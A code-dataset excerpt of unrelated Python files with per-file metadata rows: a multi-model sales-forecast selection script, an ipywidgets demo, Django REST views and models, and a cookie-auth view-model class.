log_path_filename = ''.join([local_submodule_settings['log_path'], current_script_name, '.log'])
logging.basicConfig(filename=log_path_filename, level=logging.DEBUG,
format='%(asctime)s %(levelname)s %(name)s %(message)s')
logger = logging.getLogger(__name__)
logHandler = handlers.RotatingFileHandler(log_path_filename, maxBytes=10485760, backupCount=5)
logger.addHandler(logHandler)
# load custom libraries
sys.path.insert(1, local_submodule_settings['custom_library_path'])
from save_forecast_and_make_submission import save_forecast_and_submission
from stochastic_model_obtain_results import stochastic_simulation_results_analysis
class explore_day_by_day_results_and_generate_submission:
def run(self, submission_name, local_ergs_settings):
try:
print('\nstarting the granular day_by_day ts_by_ts point forecast selection approach')
# first check the stage, if evaluation stage, this means that no MSE are available, warning about this
if local_ergs_settings['competition_stage'] != 'submitting_after_June_1th_using_1913days':
print('settings indicate that the final stage is now in progress')
print('so there not available real MSE for comparison')
print('the last saved data will be used and allow to continue..')
print(''.join(['\x1b[0;2;41m',
'but be careful with this submission and consider other way to make the final submit',
'\x1b[0m']))
# loading the forecasts
first_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'first_model_forecast_data.npy']))
second_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'second_model_forecast_data.npy']))
third_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'third_model_forecast_data.npy']))
fourth_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'fourth_model_forecast_data.npy']))
# this forecast has the shape=30490, 28
fifth_model_forecast_30490_28 = np.load(''.join([local_ergs_settings['train_data_path'],
'fifth_model_forecast_data.npy']))
fifth_model_forecast = np.zeros(shape=(60980, 28), dtype=np.dtype('float32'))
fifth_model_forecast[0: 30490, :] = fifth_model_forecast_30490_28
sixth_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'sixth_model_forecast_data.npy']))
seventh_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'seventh_model_forecast_data.npy']))
eighth_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'eighth_model_nearest_neighbor_forecast_data.npy']))
ninth_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'ninth_model_random_average_simulation_forecast_data.npy']))
best_mse_model_forecast = np.load(''.join([local_ergs_settings['train_data_path'],
'mse_based_best_ts_forecast.npy']))
# day by day comparison
with open(''.join([local_ergs_settings['hyperparameters_path'],
'organic_in_block_time_serie_based_model_hyperparameters.json'])) \
as local_r_json_file:
local_model_ergs_hyperparameters = json.loads(local_r_json_file.read())
local_r_json_file.close()
nof_ts = local_ergs_settings['number_of_time_series']
local_forecast_horizon_days = local_ergs_settings['forecast_horizon_days']
best_lower_error_ts_day_by_day_y_pred = np.zeros(shape=(nof_ts, local_forecast_horizon_days),
dtype=np.dtype('float32'))
count_best_first_model, count_best_second_model, count_best_third_model, count_best_fourth_model,\
count_best_fifth_model, count_best_sixth_model, count_best_seventh_model, count_best_eighth_model,\
count_best_ninth_model, count_best_mse_model = 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
ts_model_mse = []
# accessing ground_truth data and rechecking stage of competition
local_ergs_raw_data_filename = 'sales_train_evaluation.csv'
local_ergs_raw_unit_sales = pd.read_csv(''.join([local_ergs_settings['raw_data_path'],
local_ergs_raw_data_filename]))
print('raw sales data accessed (day_by_day_approach_best_lower_error_model results evaluation)')
# extract data and check dimensions
local_ergs_raw_unit_sales = local_ergs_raw_unit_sales.iloc[:, 6:].values
local_max_selling_time = np.shape(local_ergs_raw_unit_sales)[1]
local_settings_max_selling_time = local_ergs_settings['max_selling_time']
if local_settings_max_selling_time + 28 <= local_max_selling_time:
local_ergs_raw_unit_sales_ground_truth = local_ergs_raw_unit_sales
print('ground_truth data obtained')
print('length raw data ground truth:', local_ergs_raw_unit_sales_ground_truth.shape[1])
local_ergs_raw_unit_sales = local_ergs_raw_unit_sales[:, :local_settings_max_selling_time]
print('length raw data for training:', local_ergs_raw_unit_sales.shape[1])
elif local_max_selling_time != local_settings_max_selling_time:
print("settings doesn't match data dimensions, it must be rechecked before continue"
"(_day_by_day_best_lower_error_model_module)")
logger.info(''.join(['\n', datetime.datetime.now().strftime("%d.%b %Y %H:%M:%S"),
' data dimensions does not match settings']))
return False
else:
if local_ergs_settings['competition_stage'] != 'submitting_after_June_1th_using_1941days':
print(''.join(['\x1b[0;2;41m', 'Warning', '\x1b[0m']))
print('please check: forecast horizon days will be included within training data')
print('It was expected that the last 28 days were not included..')
print('to avoid overfitting')
elif local_ergs_settings['competition_stage'] == 'submitting_after_June_1th_using_1941days':
print(''.join(['\x1b[0;2;41m', 'Straight end of the competition', '\x1b[0m']))
print('settings indicate that this is the last stage!')
print('caution: take in consideration that evaluations in this point are not useful, '
'because will be made using the last data (the same used in training)')
# will only use the last data available
local_ergs_raw_unit_sales_ground_truth = \
local_ergs_raw_unit_sales_ground_truth[:, -local_forecast_horizon_days:]
# very granular approach
# iterating in each point_forecast, calculating error and selecting best lower error model forecast
for time_serie_index, day_index in it.product(range(nof_ts), range(local_forecast_horizon_days)):
# acquiring day_by_day data
ground_truth_ts_day = local_ergs_raw_unit_sales_ground_truth[time_serie_index, day_index]
first_model_ts_day = first_model_forecast[time_serie_index, day_index]
second_model_ts_day = second_model_forecast[time_serie_index, day_index]
third_model_ts_day = third_model_forecast[time_serie_index, day_index]
fourth_model_ts_day = fourth_model_forecast[time_serie_index, day_index]
fifth_model_ts_day = fifth_model_forecast[time_serie_index, day_index]
sixth_model_ts_day = sixth_model_forecast[time_serie_index, day_index]
seventh_model_ts_day = seventh_model_forecast[time_serie_index, day_index]
eighth_model_ts_day = eighth_model_forecast[time_serie_index, day_index].astype(np.dtype('float32'))
ninth_model_ts_day = ninth_model_forecast[time_serie_index, day_index]
best_mse_model_ts_day = best_mse_model_forecast[time_serie_index, day_index]
# calculating error
first_model_ts_day_error = np.abs(ground_truth_ts_day - first_model_ts_day)
second_model_ts_day_error = np.abs(ground_truth_ts_day - second_model_ts_day)
third_model_ts_day_error = np.abs(ground_truth_ts_day - third_model_ts_day)
fourth_model_ts_day_error = np.abs(ground_truth_ts_day - fourth_model_ts_day)
fifth_model_ts_day_error = np.abs(ground_truth_ts_day - fifth_model_ts_day)
sixth_model_ts_day_error = np.abs(ground_truth_ts_day - sixth_model_ts_day)
seventh_model_ts_day_error = np.abs(ground_truth_ts_day - seventh_model_ts_day)
eighth_model_ts_day_error = np.abs(ground_truth_ts_day - eighth_model_ts_day)
ninth_model_ts_day_error = np.abs(ground_truth_ts_day - ninth_model_ts_day)
best_mse_model_ts_day_error = np.abs(ground_truth_ts_day - best_mse_model_ts_day)
# selecting best point ts_day forecast
if first_model_ts_day_error <= second_model_ts_day_error and \
first_model_ts_day_error <= third_model_ts_day_error \
and first_model_ts_day_error <= fourth_model_ts_day_error \
and first_model_ts_day_error <= fifth_model_ts_day_error\
and first_model_ts_day_error <= sixth_model_ts_day_error \
and first_model_ts_day_error <= seventh_model_ts_day_error\
and first_model_ts_day_error <= eighth_model_ts_day_error \
and first_model_ts_day_error <= ninth_model_ts_day_error \
and first_model_ts_day_error <= best_mse_model_ts_day_error:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = first_model_ts_day
count_best_first_model += 1
ts_model_mse.append([time_serie_index, int(1), first_model_ts_day_error])
# elif best_mse_model_ts_day_error <= first_model_ts_day_error \
# and best_mse_model_ts_day_error <= second_model_ts_day_error \
# and best_mse_model_ts_day_error <= third_model_ts_day_error \
# and best_mse_model_ts_day_error <= fourth_model_ts_day_error\
# and best_mse_model_ts_day_error <= fifth_model_ts_day_error \
# and best_mse_model_ts_day_error <= sixth_model_ts_day_error\
# and best_mse_model_ts_day_error <= seventh_model_ts_day_error \
# and best_mse_model_ts_day_error <= eighth_model_ts_day_error\
# and best_mse_model_ts_day_error <= ninth_model_ts_day_error:
# best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = best_mse_model_ts_day
# count_best_mse_model += 1
# ts_model_mse.append([time_serie_index, int(10), best_mse_model_ts_day_error])
elif second_model_ts_day_error <= first_model_ts_day_error \
and second_model_ts_day_error <= third_model_ts_day_error \
and second_model_ts_day_error <= fourth_model_ts_day_error \
and second_model_ts_day_error <= fifth_model_ts_day_error\
and second_model_ts_day_error <= sixth_model_ts_day_error \
and second_model_ts_day_error <= seventh_model_ts_day_error\
and second_model_ts_day_error <= eighth_model_ts_day_error \
and second_model_ts_day_error <= ninth_model_ts_day_error\
and second_model_ts_day_error <= best_mse_model_ts_day_error:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = second_model_ts_day
count_best_second_model += 1
ts_model_mse.append([time_serie_index, int(2), second_model_ts_day_error])
elif third_model_ts_day_error <= first_model_ts_day_error \
and third_model_ts_day_error <= second_model_ts_day_error \
and third_model_ts_day_error <= fourth_model_ts_day_error \
and third_model_ts_day_error <= fifth_model_ts_day_error\
and third_model_ts_day_error <= sixth_model_ts_day_error \
and third_model_ts_day_error <= seventh_model_ts_day_error\
and third_model_ts_day_error <= eighth_model_ts_day_error \
and third_model_ts_day_error <= ninth_model_ts_day_error\
and third_model_ts_day_error <= best_mse_model_ts_day_error:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = third_model_ts_day
count_best_third_model += 1
ts_model_mse.append([time_serie_index, int(3), third_model_ts_day_error])
# elif fourth_model_ts_day_error <= first_model_ts_day_error \
# and fourth_model_ts_day_error <= second_model_ts_day_error \
# and fourth_model_ts_day_error <= third_model_ts_day_error \
# and fourth_model_ts_day_error <= fifth_model_ts_day_error\
# and fourth_model_ts_day_error <= sixth_model_ts_day_error \
# and fourth_model_ts_day_error <= seventh_model_ts_day_error\
# and fourth_model_ts_day_error <= eighth_model_ts_day_error \
# and fourth_model_ts_day_error <= ninth_model_ts_day_error\
# and fourth_model_ts_day_error <= best_mse_model_ts_day_error:
# best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = fourth_model_ts_day
# count_best_fourth_model += 1
# ts_model_mse.append([time_serie_index, int(4), fourth_model_ts_day_error])
elif fifth_model_ts_day_error <= first_model_ts_day_error \
and fifth_model_ts_day_error <= second_model_ts_day_error \
and fifth_model_ts_day_error <= third_model_ts_day_error \
and fifth_model_ts_day_error <= fourth_model_ts_day_error\
and fifth_model_ts_day_error <= sixth_model_ts_day_error \
and fifth_model_ts_day_error <= seventh_model_ts_day_error\
and fifth_model_ts_day_error <= eighth_model_ts_day_error \
and fifth_model_ts_day_error <= ninth_model_ts_day_error\
and fifth_model_ts_day_error <= best_mse_model_ts_day_error:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = fifth_model_ts_day
count_best_fifth_model += 1
ts_model_mse.append([time_serie_index, int(5), fifth_model_ts_day_error])
elif sixth_model_ts_day_error <= first_model_ts_day_error \
and sixth_model_ts_day_error <= second_model_ts_day_error \
and sixth_model_ts_day_error <= third_model_ts_day_error \
and sixth_model_ts_day_error <= fourth_model_ts_day_error\
and sixth_model_ts_day_error <= fifth_model_ts_day_error \
and sixth_model_ts_day_error <= seventh_model_ts_day_error\
and sixth_model_ts_day_error <= eighth_model_ts_day_error \
and sixth_model_ts_day_error <= ninth_model_ts_day_error\
and sixth_model_ts_day_error <= best_mse_model_ts_day_error:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = sixth_model_ts_day
count_best_sixth_model += 1
ts_model_mse.append([time_serie_index, int(6), sixth_model_ts_day_error])
elif seventh_model_ts_day_error <= first_model_ts_day_error \
and seventh_model_ts_day_error <= second_model_ts_day_error \
and seventh_model_ts_day_error <= third_model_ts_day_error \
and seventh_model_ts_day_error <= fourth_model_ts_day_error\
and seventh_model_ts_day_error <= fifth_model_ts_day_error \
and seventh_model_ts_day_error <= sixth_model_ts_day_error\
and seventh_model_ts_day_error <= eighth_model_ts_day_error \
and seventh_model_ts_day_error <= ninth_model_ts_day_error\
and seventh_model_ts_day_error <= best_mse_model_ts_day_error:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = seventh_model_ts_day
count_best_seventh_model += 1
ts_model_mse.append([time_serie_index, int(7), seventh_model_ts_day_error])
elif ninth_model_ts_day_error <= first_model_ts_day_error \
and ninth_model_ts_day_error <= second_model_ts_day_error \
and ninth_model_ts_day_error <= third_model_ts_day_error \
and ninth_model_ts_day_error <= fourth_model_ts_day_error\
and ninth_model_ts_day_error <= fifth_model_ts_day_error \
and ninth_model_ts_day_error <= sixth_model_ts_day_error\
and ninth_model_ts_day_error <= seventh_model_ts_day_error \
and ninth_model_ts_day_error <= eighth_model_ts_day_error\
and ninth_model_ts_day_error <= best_mse_model_ts_day_error:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = ninth_model_ts_day
count_best_ninth_model += 1
ts_model_mse.append([time_serie_index, int(9), ninth_model_ts_day_error])
else:
best_lower_error_ts_day_by_day_y_pred[time_serie_index, day_index] = eighth_model_ts_day
count_best_eighth_model += 1
ts_model_mse.append([time_serie_index, int(8), eighth_model_ts_day_error])
# finally reporting the results
print('it was used ', count_best_first_model, ' ts day_by_day forecasts from first model')
print('it was used ', count_best_second_model, ' ts day_by_day forecasts from second model')
print('it was used ', count_best_third_model, ' ts day_by_day forecasts from third model')
print('it was used ', count_best_fourth_model, ' ts day_by_day forecasts from fourth model')
print('it was used ', count_best_fifth_model, ' ts day_by_day forecasts from fifth model')
print('it was used ', count_best_sixth_model, ' ts day_by_day forecasts from sixth model')
print('it was used ', count_best_seventh_model, ' ts day_by_day forecasts from seventh model')
print('it was used ', count_best_eighth_model, ' ts day_by_day forecasts from eighth model')
print('it was used ', count_best_ninth_model, ' ts day_by_day forecasts from ninth model')
print('it was used ', count_best_mse_model, ' ts day_by_day forecasts from best_mse (tenth) model')
# saving best mse_based between different models forecast and submission
store_and_submit_best_model_forecast = save_forecast_and_submission()
point_error_based_best_model_save_review = \
store_and_submit_best_model_forecast.store_and_submit(submission_name, local_ergs_settings,
best_lower_error_ts_day_by_day_y_pred)
if point_error_based_best_model_save_review:
print('best low point forecast error and generate_submission data and submission done')
else:
print('error at storing best_low_point_forecast_error data and generate_submission or submission')
# evaluating the best_lower_error criteria granular_model forecast
local_ergs_forecasts_name = 'day_by_day_best_low_error_criteria_model_forecast'
zeros_as_forecast = stochastic_simulation_results_analysis()
zeros_as_forecast_review = \
zeros_as_forecast.evaluate_stochastic_simulation(local_ergs_settings,
local_model_ergs_hyperparameters,
local_ergs_raw_unit_sales,
local_ergs_raw_unit_sales_ground_truth,
local_ergs_forecasts_name)
# saving errors by time_serie and storing the estimated best model
ts_model_mse = np.array(ts_model_mse)
np.save(''.join([local_ergs_settings['models_evaluation_path'],
'best_low_point_forecast_error_ts_model_mse']), ts_model_mse)
np.savetxt(''.join([local_ergs_settings['models_evaluation_path'],
'best_low_point_forecast_error_ts_model_mse.csv']),
ts_model_mse, fmt='%10.15f', delimiter=',', newline='\n')
except Exception as submodule_error:
print('best low point forecast error and generate_submission submodule_error: ', submodule_error)
logger.info('error in best low point forecast error and generate_submission submodule')
logger.error(str(submodule_error), exc_info=True)
return False
return True
| 75.449838 | 117 | 0.643304 | 3,023 | 23,314 | 4.401588 | 0.096593 | 0.09244 | 0.166842 | 0.205171 | 0.655193 | 0.595446 | 0.566737 | 0.503983 | 0.503607 | 0.445062 | 0 | 0.007917 | 0.295659 | 23,314 | 308 | 118 | 75.694805 | 0.802387 | 0.109677 | 0 | 0.020161 | 0 | 0 | 0.149817 | 0.042632 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004032 | false | 0 | 0.044355 | 0 | 0.064516 | 0.120968 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e0f362a45c4f8460dcc3847929a4cd4b6c3c07d | 1,394 | py | Python | python/src/widget-play/simple_widgets.py | nagi49000/ipywidgets-play | ebb80366cc4bca2315e8c91d74fc6dbc5ccbc73f | [
"BSD-3-Clause"
] | null | null | null | python/src/widget-play/simple_widgets.py | nagi49000/ipywidgets-play | ebb80366cc4bca2315e8c91d74fc6dbc5ccbc73f | [
"BSD-3-Clause"
] | null | null | null | python/src/widget-play/simple_widgets.py | nagi49000/ipywidgets-play | ebb80366cc4bca2315e8c91d74fc6dbc5ccbc73f | [
"BSD-3-Clause"
] | null | null | null | from ipywidgets import interact
import ipywidgets as widgets
from IPython.display import display
class SimpleWidgets():
def __init__(self):
self._int_slider_widget = None
self._clicked_next_widget = None
self._button = None
def do_stuff_on_click(self, b):
if self._clicked_next_widget:
self._clicked_next_widget.close()
if self._int_slider_widget.value < 10:
@interact
def get_check_box():
x = widgets.Checkbox(value=False, description='Check me')
self._clicked_next_widget = x
return x
else:
@interact
def get_text():
x = widgets.Dropdown(options=['alpha', 'beta', 'gamma'], value='alpha', description='Text:')
self._clicked_next_widget = x
return x
def run_simple_widgets(self):
@interact
def get_int_slider():
x = widgets.IntSlider(min=0, max=30, step=1, value=10)
self._int_slider_widget = x
return x
self._button = widgets.Button(description="Click Me!")
display(self._button)
self._button.on_click(self.do_stuff_on_click)
@property
def last_value(self):
if self._clicked_next_widget:
return self._clicked_next_widget.value
else:
return None
| 30.304348 | 108 | 0.596844 | 164 | 1,394 | 4.75 | 0.341463 | 0.098845 | 0.134788 | 0.188703 | 0.133504 | 0.074454 | 0.074454 | 0 | 0 | 0 | 0 | 0.008412 | 0.317791 | 1,394 | 45 | 109 | 30.977778 | 0.810726 | 0 | 0 | 0.315789 | 0 | 0 | 0.029412 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.184211 | false | 0 | 0.078947 | 0 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e17b72cf2b4124832cbe8928b8fedf3bcbc6efe | 832 | py | Python | article/views/product_views.py | rayenmhamdi/Kye_BackendAPI | a4fa8a345d2678b5bd3a9b74451e9274ca9abad2 | [
"MIT"
] | null | null | null | article/views/product_views.py | rayenmhamdi/Kye_BackendAPI | a4fa8a345d2678b5bd3a9b74451e9274ca9abad2 | [
"MIT"
] | null | null | null | article/views/product_views.py | rayenmhamdi/Kye_BackendAPI | a4fa8a345d2678b5bd3a9b74451e9274ca9abad2 | [
"MIT"
] | null | null | null | # Create your views here.
from rest_framework import generics
from rest_framework.permissions import IsAuthenticated
from article.models import Product
from article.serializers import ProductSerializer
class ProductListCreateView(generics.ListCreateAPIView):
"""Create Product"""
permission_classes = [IsAuthenticated]
queryset = Product.objects.order_by('-date_modified')
serializer_class = ProductSerializer
def perform_create(self, serializer):
"""Save the post data when creating a new product."""
serializer.save()
class ProductDetailsView(generics.RetrieveUpdateDestroyAPIView):
"""This class handles the http GET, PUT and DELETE requests for a product."""
permission_classes = [IsAuthenticated]
queryset = Product.objects.all()
serializer_class = ProductSerializer
| 30.814815 | 81 | 0.768029 | 87 | 832 | 7.241379 | 0.586207 | 0.025397 | 0.053968 | 0.12381 | 0.193651 | 0.193651 | 0.193651 | 0 | 0 | 0 | 0 | 0 | 0.157452 | 832 | 26 | 82 | 32 | 0.898716 | 0.191106 | 0 | 0.285714 | 0 | 0 | 0.021341 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.285714 | 0 | 0.928571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
1e17f7e7bd55d4f6e429e9260e2a13c0d3c9260e | 7,371 | py | Python | django/pyrog/models.py | arkhn/fhir-river | a12179c34fad131d16dedc20c61297ed83d805e6 | [
"Apache-2.0"
] | 42 | 2020-03-25T16:47:30.000Z | 2022-01-31T21:26:38.000Z | django/pyrog/models.py | arkhn/fhir-river | a12179c34fad131d16dedc20c61297ed83d805e6 | [
"Apache-2.0"
] | 367 | 2020-04-08T12:46:34.000Z | 2022-02-16T01:15:32.000Z | django/pyrog/models.py | arkhn/fhir-river | a12179c34fad131d16dedc20c61297ed83d805e6 | [
"Apache-2.0"
] | 3 | 2020-05-14T08:24:46.000Z | 2021-08-04T05:00:16.000Z | import uuid
from django.conf import settings
from django.db import models
from cuid import cuid
class Source(models.Model):
id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
name = models.TextField(unique=True)
version = models.TextField(blank=True, default="")
users = models.ManyToManyField(settings.AUTH_USER_MODEL, related_name="sources", through="SourceUser")
updated_at = models.DateTimeField(auto_now=True)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.name
class SourceUser(models.Model):
class Meta:
unique_together = (("user", "source"),)
class SourceRole(models.TextChoices):
WRITER = "WRITER"
READER = "READER"
id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name="user_sources", on_delete=models.CASCADE)
source = models.ForeignKey(Source, related_name="source_users", on_delete=models.CASCADE)
role = models.TextField(choices=SourceRole.choices, default=SourceRole.READER)
class Resource(models.Model):
id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
source = models.ForeignKey(Source, related_name="resources", on_delete=models.CASCADE)
label = models.TextField(blank=True, default="")
primary_key_table = models.TextField()
primary_key_column = models.TextField()
definition_id = models.TextField()
definition = models.JSONField()
logical_reference = models.UUIDField(default=uuid.uuid4, editable=False)
primary_key_owner = models.ForeignKey("Owner", related_name="resources", on_delete=models.RESTRICT)
updated_at = models.DateTimeField(auto_now=True)
created_at = models.DateTimeField(auto_now_add=True)
class Credential(models.Model):
class Dialect(models.TextChoices):
MSSQL = "MSSQL"
POSTGRESQL = "POSTGRES"
ORACLE = "ORACLE"
SQLLITE = "SQLLITE"
id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
source = models.OneToOneField(Source, on_delete=models.CASCADE)
host = models.TextField()
port = models.IntegerField()
database = models.TextField()
login = models.TextField()
password = models.TextField()
model = models.TextField(choices=Dialect.choices)
updated_at = models.DateTimeField(auto_now=True)
created_at = models.DateTimeField(auto_now_add=True)
class Attribute(models.Model):
id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
path = models.TextField()
slice_name = models.TextField(blank=True, default="")
definition_id = models.TextField()
resource = models.ForeignKey(Resource, related_name="attributes", on_delete=models.CASCADE)
updated_at = models.DateTimeField(auto_now=True)
created_at = models.DateTimeField(auto_now_add=True)
class Comment(models.Model):
id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
content = models.TextField()
validated = models.BooleanField(default=False)
author = models.ForeignKey(settings.AUTH_USER_MODEL, related_name="comments", on_delete=models.CASCADE)
attribute = models.ForeignKey(Attribute, related_name="comments", on_delete=models.CASCADE)
updated_at = models.DateTimeField(auto_now=True)
created_at = models.DateTimeField(auto_now_add=True)
class InputGroup(models.Model):
id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
merging_script = models.TextField(blank=True, default="")
attribute = models.ForeignKey(Attribute, related_name="input_groups", on_delete=models.CASCADE)
updated_at = models.DateTimeField(auto_now=True)
created_at = models.DateTimeField(auto_now_add=True)
class Input(models.Model):
id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
updated_at = models.DateTimeField(auto_now=True)
created_at = models.DateTimeField(auto_now_add=True)
class Meta:
abstract = True
class StaticInput(Input):
input_group = models.ForeignKey(InputGroup, related_name="static_inputs", on_delete=models.CASCADE)
value = models.TextField(blank=True, null=True, default=None)
class SQLInput(Input):
input_group = models.ForeignKey(
InputGroup, blank=True, null=True, related_name="sql_inputs", on_delete=models.CASCADE
)
column = models.OneToOneField("Column", related_name="sql_input", on_delete=models.CASCADE)
script = models.TextField(blank=True, default="")
concept_map_id = models.TextField(blank=True, default="")
class Column(models.Model):
id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
table = models.TextField()
column = models.TextField()
owner = models.ForeignKey("Owner", related_name="columns", on_delete=models.RESTRICT)
updated_at = models.DateTimeField(auto_now=True)
created_at = models.DateTimeField(auto_now_add=True)
class Join(models.Model):
id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
sql_input = models.ForeignKey(SQLInput, related_name="joins", on_delete=models.CASCADE)
left = models.ForeignKey(Column, related_name="joined_left", on_delete=models.CASCADE)
right = models.ForeignKey(Column, related_name="joined_right", on_delete=models.CASCADE)
updated_at = models.DateTimeField(auto_now=True)
created_at = models.DateTimeField(auto_now_add=True)
class Condition(models.Model):
class Action(models.TextChoices):
INCLUDE = "INCLUDE"
EXCLUDE = "EXCLUDE"
class Relation(models.TextChoices):
EQUAL = "EQ"
GREATER = "GT"
GREATER_OR_EQUAL = "GE"
LESSER = "LT"
LESSER_OR_EQUAL = "LE"
NOTNULL = "NOTNULL"
NULL = "NULL"
id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
action = models.TextField(choices=Action.choices)
sql_input = models.OneToOneField(SQLInput, on_delete=models.CASCADE)
value = models.TextField(blank=True, default="")
input_group = models.ForeignKey(InputGroup, related_name="conditions", on_delete=models.CASCADE)
relation = models.TextField(choices=Relation.choices, default=Relation.EQUAL)
class Filter(models.Model):
class Relation(models.TextChoices):
EQUAL = "="
NOT_EQUAL = "<>"
IN = "IN"
GREATER = ">"
GREATER_OR_EQUAL = ">="
LESSER = "<"
LESSER_OR_EQUAL = "<="
id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
relation = models.TextField(choices=Relation.choices)
value = models.TextField(blank=True, default="")
resource = models.ForeignKey(Resource, related_name="filters", on_delete=models.CASCADE)
sql_input = models.OneToOneField(SQLInput, on_delete=models.CASCADE)
class Owner(models.Model):
class Meta:
unique_together = (("name", "credential"),)
id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
name = models.TextField()
schema = models.JSONField(blank=True, null=True)
credential = models.ForeignKey(Credential, related_name="owners", on_delete=models.CASCADE)
| 38.19171 | 109 | 0.723647 | 888 | 7,371 | 5.827703 | 0.154279 | 0.118841 | 0.056812 | 0.077101 | 0.630725 | 0.58686 | 0.438454 | 0.411014 | 0.392464 | 0.355556 | 0 | 0.000161 | 0.15561 | 7,371 | 192 | 110 | 38.390625 | 0.831298 | 0 | 0 | 0.295775 | 0 | 0 | 0.04572 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007042 | false | 0.007042 | 0.028169 | 0.007042 | 0.809859 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
1e1cc73e30977ae43a9cf7e8a84711da0700a5cb | 580 | py | Python | viewmodels/shared/viewmodel.py | PASTAplus/web-x | 7e27a354bbc3873f6e9ea9881e6d1f00b8d52a33 | [
"Apache-2.0"
] | null | null | null | viewmodels/shared/viewmodel.py | PASTAplus/web-x | 7e27a354bbc3873f6e9ea9881e6d1f00b8d52a33 | [
"Apache-2.0"
] | 8 | 2022-01-31T20:03:12.000Z | 2022-03-28T02:42:07.000Z | viewmodels/shared/viewmodel.py | PASTAplus/web-x | 7e27a354bbc3873f6e9ea9881e6d1f00b8d52a33 | [
"Apache-2.0"
] | 1 | 2022-03-18T14:36:42.000Z | 2022-03-18T14:36:42.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
:Mod: viewmodel
:Synopsis:
:Author:
servilla
:Created:
5/25/21
"""
from typing import Optional
from starlette.requests import Request
from services import cookie_auth
class ViewModelBase:
def __init__(self, request: Request):
self.request: Request = request
self.error: Optional[str] = None
self.user_id: Optional[str] = None
self.is_logged_in, self.common_name = cookie_auth.get_user_via_auth_cookie(self.request)
def to_dict(self) -> dict:
return self.__dict__
| 17.575758 | 96 | 0.677586 | 76 | 580 | 4.921053 | 0.605263 | 0.088235 | 0.096257 | 0.101604 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013129 | 0.212069 | 580 | 32 | 97 | 18.125 | 0.805252 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.272727 | 0.090909 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
1e1f987a5674c8ebd8c0480fbd04b03094c446ea | 6,545 | py | Python | packages/w3af/w3af/plugins/audit/frontpage.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | 3 | 2019-04-09T22:59:33.000Z | 2019-06-14T09:23:24.000Z | tools/w3af/w3af/plugins/audit/frontpage.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
